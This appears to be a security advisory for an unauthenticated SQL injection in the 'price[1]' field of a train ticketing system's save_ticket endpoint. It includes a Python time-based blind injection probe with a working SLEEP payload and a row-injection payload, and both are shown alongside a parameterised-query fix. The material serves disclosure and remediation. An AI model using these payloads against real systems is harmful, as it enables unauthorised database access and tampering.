SourceCodester Train Station Ticketing System SQL Injection Vulnerability

Vulnerability

A SQL injection vulnerability has been identified in SourceCodester Train Station Ticketing System version 1.0. The flaw is in '/ajax.php?action=save_ticket', where the value of the POST parameter 'price[1]' (one element of the 'price' array submitted when a ticket is saved) is placed into a SQL query without validation, escaping or parameter binding. An attacker who controls that value can therefore change the query the application runs, which may lead to unauthorized database access, data manipulation and exposure of sensitive information. The vulnerability can be exploited remotely, without any authentication.

Impact

Exploiting this flaw lets an attacker interfere with the queries the application issues to its database: reading data they are not authorized to see, modifying or deleting records and, depending on the privileges of the database account the application connects with, executing administrative operations on the database server.

Reproduction

To reproduce, send a POST request to '/ajax.php?action=save_ticket' whose form body includes the 'price[1]' parameter. First submit a plain numeric price and note the response time, then submit a time-based blind SQL injection payload (a conditional delay such as a sleep function) in 'price[1]'. A response that is delayed by roughly the requested sleep time, while the baseline request returns immediately, shows that the injected SQL was executed. Because the payload works through timing alone, no error message or database content needs to appear in the response for the check to succeed.
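The timing check described above, as an added example that is not part of the original advisory and not the reporter's proof of concept. It assumes, none of which the page states, a MySQL backend so that SLEEP() exists, a single-quoted string context for the injected value, and a form-encoded POST body. The mock server at the bottom is a constructed stand-in that only sleeps when it sees SLEEP in price[1]; it exists so the script runs offline. To test the real application, point the base URL at a lab instance instead of the mock.

```python
"""Time-based blind SQLi probe for the price[1] POST parameter.

Added example, not the advisory's own code. Assumptions (not from the page):
MySQL backend (SLEEP available), single-quoted string context, form-encoded
POST. The mock handler is a constructed stand-in for a vulnerable ajax.php.
"""
import re
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

ENDPOINT = "/ajax.php?action=save_ticket"


def build_body(price_value, extra=None):
    """Form body with price[1] set to price_value; other fields are placeholders."""
    fields = {"price[1]": price_value}
    if extra:
        fields.update(extra)
    return urlencode(fields).encode()


def sleep_payload(seconds):
    # Closes the assumed single-quoted value, appends a sleep, comments out the rest.
    return f"1' AND SLEEP({seconds})-- -"


def timed_post(base_url, body, timeout):
    """POST the body and return the wall-clock time the request took, in seconds."""
    req = Request(base_url + ENDPOINT, data=body,
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    t0 = time.monotonic()
    with urlopen(req, timeout=timeout) as resp:
        resp.read()
    return time.monotonic() - t0


def looks_injectable(baseline, delayed, delay):
    """Conservative decision: the delayed request must exceed the baseline by most of the sleep."""
    return delayed - baseline >= 0.8 * delay


def probe(base_url, delay=3):
    """Compare a benign price against a SLEEP payload; True means the delay was observed."""
    baseline = timed_post(base_url, build_body("100"), timeout=delay * 4)
    delayed = timed_post(base_url, build_body(sleep_payload(delay)), timeout=delay * 4)
    return looks_injectable(baseline, delayed, delay)


# --- constructed mock of a vulnerable handler, for offline runs only ---
class _MockVulnerableHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        value = form.get("price[1]", [""])[0]
        m = re.search(r"SLEEP\((\d+)\)", value, re.I)
        if m:
            time.sleep(int(m.group(1)))  # stands in for MySQL executing SLEEP()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"1")

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_mock_server():
    """Start the mock on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _MockVulnerableHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


if __name__ == "__main__":
    srv, url = start_mock_server()  # replace url with a lab instance to probe the real app
    print("time-based injection indicated:", probe(url, delay=2))
    srv.shutdown()
```

The 0.8 factor in looks_injectable keeps network jitter from masking a real delay while still rejecting a slow but unaffected response; repeat the probe with two different sleep values before reporting a finding, since a single delayed response can also be a loaded server.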

Remediation

Build the query with prepared statements and bind every element of 'price[]' as a parameter instead of concatenating it into the SQL text; this alone removes the injection. In addition, validate each submitted price server side (for example, accept only a decimal number within the expected range) and reject the request otherwise. Since the endpoint is reachable without authentication, restricting it to logged-in users reduces exposure but does not replace the query fix. Regular security audits help find similar patterns elsewhere in the code base.
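The fix described above, shown as an added example that is not the project's code. The table name, the query shape and the injected string are assumptions chosen to mirror the advisory's 'price[1]' parameter; the real ajax.php may build its query differently. sqlite3 is used so the demo runs offline, and the same change applies with mysqli or PDO in PHP: bind the value, never splice it into the statement.

```python
"""Vulnerable string-built INSERT versus a validated, parameterised one.

Added example, not the project's code. The schema, query shape and payload are
assumptions modelled on the advisory's price[1] parameter.
"""
import re
import sqlite3

# Server-side format check for a price: up to 8 digits, optional 2 decimals.
PRICE_RE = re.compile(r"^\d{1,8}(\.\d{1,2})?$")


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ticket_prices (ticket_id INTEGER, seat_type INTEGER, price TEXT)")
    return db


def save_ticket_vulnerable(db, ticket_id, prices):
    """Concatenates each price[k] straight into the SQL text, as the advisory describes."""
    rows = ", ".join(f"({ticket_id}, {k}, '{v}')" for k, v in prices.items())
    db.execute(f"INSERT INTO ticket_prices (ticket_id, seat_type, price) VALUES {rows}")
    return db.execute("SELECT COUNT(*) FROM ticket_prices").fetchone()[0]


def save_ticket_fixed(db, ticket_id, prices):
    """Validates each price and binds it as a parameter; the value can never become SQL."""
    for k, v in prices.items():
        if not isinstance(k, int) or not PRICE_RE.match(str(v)):
            raise ValueError(f"rejected price[{k}]={v!r}")
    db.executemany(
        "INSERT INTO ticket_prices (ticket_id, seat_type, price) VALUES (?, ?, ?)",
        [(ticket_id, k, v) for k, v in prices.items()],
    )
    return db.execute("SELECT COUNT(*) FROM ticket_prices").fetchone()[0]


def bound_literal_roundtrip(value):
    """Even without validation, a bound value is stored verbatim and never parsed as SQL."""
    db = fresh_db()
    db.execute("INSERT INTO ticket_prices (ticket_id, seat_type, price) VALUES (?, ?, ?)",
               (1, 1, value))
    return db.execute("SELECT price FROM ticket_prices").fetchone()[0]


# Constructed payload for price[1]: closes the quoted value and appends a second row.
INJECTED_PRICE = "0'), (9999, 1, '0"


def demo():
    """Run the same payload through both handlers and report what each did."""
    vuln = fresh_db()
    rows_after_injection = save_ticket_vulnerable(vuln, 1, {1: INJECTED_PRICE})

    fixed = fresh_db()
    try:
        save_ticket_fixed(fixed, 1, {1: INJECTED_PRICE})
        rejected = False
    except ValueError:
        rejected = True
    rows_after_fix = save_ticket_fixed(fixed, 1, {1: "120.50"})

    return {
        "rows_after_injection": rows_after_injection,  # 2: attacker added a row
        "payload_rejected": rejected,                  # True: validation stopped it
        "rows_after_fix": rows_after_fix,              # 1: only the legitimate price
    }


if __name__ == "__main__":
    print(demo())
    print("bound payload stored as literal:", bound_literal_roundtrip(INJECTED_PRICE) == INJECTED_PRICE)
```

Validation and binding are independent layers: bound_literal_roundtrip shows that binding alone already stops the payload from becoming SQL, and the format check in save_ticket_fixed additionally keeps junk out of the price column and gives the application a clean place to log rejected input.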

Added: Nov 18, 2025, 12:19 PM
Updated: Nov 18, 2025, 2:40 PM

Vulnerability Rating

Custom Algorithm

spread:         0.0
impact:         5.0
exploitability: 6.0
remediation:    0.0
relevance:      1.1
threat:         6.4
urgency:        2.9
incentive:      1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.